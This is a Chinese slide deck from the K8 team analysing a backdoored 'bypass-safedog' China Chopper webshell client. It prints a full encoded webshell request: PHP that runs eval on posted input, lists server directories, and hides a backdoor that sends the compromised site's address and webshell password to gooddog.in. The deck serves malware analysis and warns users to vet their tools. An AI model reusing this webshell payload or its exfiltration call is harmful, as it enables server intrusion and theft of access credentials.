K8飞刀--解密过狗菜刀后门课件.pptVIP

* 解密过狗菜刀后门 K8拉登哥哥 K8飞刀--解密过狗菜刀后门 菜刀通讯主要用到URL编码和Base64编码加密, 下面是是菜刀连接PHP一句话执行的动作之一 想看一款web渗透相关工具有无后门,我们就得抓包解密看它的代码里有无问题. tom=%24_%3Dstrrev%28edoced_46esab%29%3B%40eval%28%24_%28%24_POST%5Bz0%5D%29%29%3Bz0=QGV2YWwoYmFzZTY0X2RlY29kZSgnYVdZb0pGOURUMDlMU1VWYkoweDVhMlVuWFNFOU1TbDdjMlYwWTI5dmEybGxLQ2RNZVd0bEp5d3hLVHRBWm1sc1pTZ25hSFIwY0RvdkwzZDNkeTVuYjI5a1pHOW5MbWx1TDBGd2FTNXdhSEEvVlhKc1BTY3VKRjlUUlZKV1JWSmJKMGhVVkZCZlNFOVRWQ2RkTGlSZlUwVlNWa1ZTV3lkU1JWRlZSVk5VWDFWU1NTZGRMaWNtVUdGemN6MG5MbXRsZVNna1gxQlBVMVFwS1R0OScpKTtAaW5pX3NldCgiZGlzcGxheV9lcnJvcnMiLCIwIik7QHNldF90aW1lX2xpbWl0KDApO0BzZXRfbWFnaWNfcXVvdGVzX3J1bnRpbWUoMCk7ZWNobygiLT58Iik7OyREPWJhc2U2NF9kZWNvZGUoJF9QT1NUWyJ6MSJdKTskRj1Ab3BlbmRpcigkRCk7aWYoJEY9PU5VTEwpe2VjaG8oIkVSUk9SOi8vIFBhdGggTm90IEZvdW5kIE9yIE5vIFBlcm1pc3Npb24hIik7fWVsc2V7JE09TlVMTDskTD1OVUxMO3doaWxlKCROPUByZWFkZGlyKCRGKSl7JFA9JEQuIi8iLiROOyRUPUBkYXRlKCJZLW0tZCBIOmk6cyIsQGZpbGVtdGltZSgkUCkpO0AkRT1zdWJzdHIoYmFzZV9jb252ZXJ0KEBmaWxlcGVybXMoJFApLDEwLDgpLC00KTskUj0iXHQiLiRULiJcdCIuQGZpbGVzaXplKCRQKS4iXHQiLiRFLiIKIjtpZihAaXNfZGlyKCRQKSkkTS49JE4uIi8iLiRSO2Vsc2UgJEwuPSROLiRSO31lY2hvICRNLiRMO0BjbG9zZWRpcigkRik7fTtlY2hvKCJ8PC0iKTtkaWUoKTs%3Dz1=QzpcXEFBV1NlcnZlclxcd3d3XFxwaHBcXA%3D%3D K8飞刀--解密过狗菜刀后门 0x001 打开菜刀 随便执行一个动作 使用Wsexplorer抓包(同类工具均可) K8飞刀--解密过狗菜刀后门 0x002 对提交的包进行解密 里面有很多百分号 我们先使用URL编码来解 如果执行动作中带有中文就使用 GB2312来解 全英文GB2312和UTF-8均可 K8飞刀--解密过狗菜刀后门 0x003 解密后 我们会看到有两个参数都经过Base64加密 先解密z1 K8飞刀--解密过狗菜刀后门 0x004 解密z0 K8飞刀--解密过狗菜刀后门 0x005 解密后发现z0参数里面 还有一层Base64加密 这是正常菜刀所没有的 肯定有问题,我们接着解密 K8飞刀--解密过狗菜刀后门 最后 解密后 我们可以很清楚的看到 被人加入的后门地址 好一招螳螂捕蝉黄雀在后 后门地址 ：http://www.gooddog.in/Api.php 中间有被干过...目前还在运作... 本文以存在后门的过狗菜刀为例...大家要学会举一反三 更高明的作者加密更多或更隐蔽 建议大家使用工具时注意好几点 1 最好从官方下载 2 必须检测有无后门 谢谢观赏 K8搞基大队 搞基有害,但是健康。 @k8gege @k8team *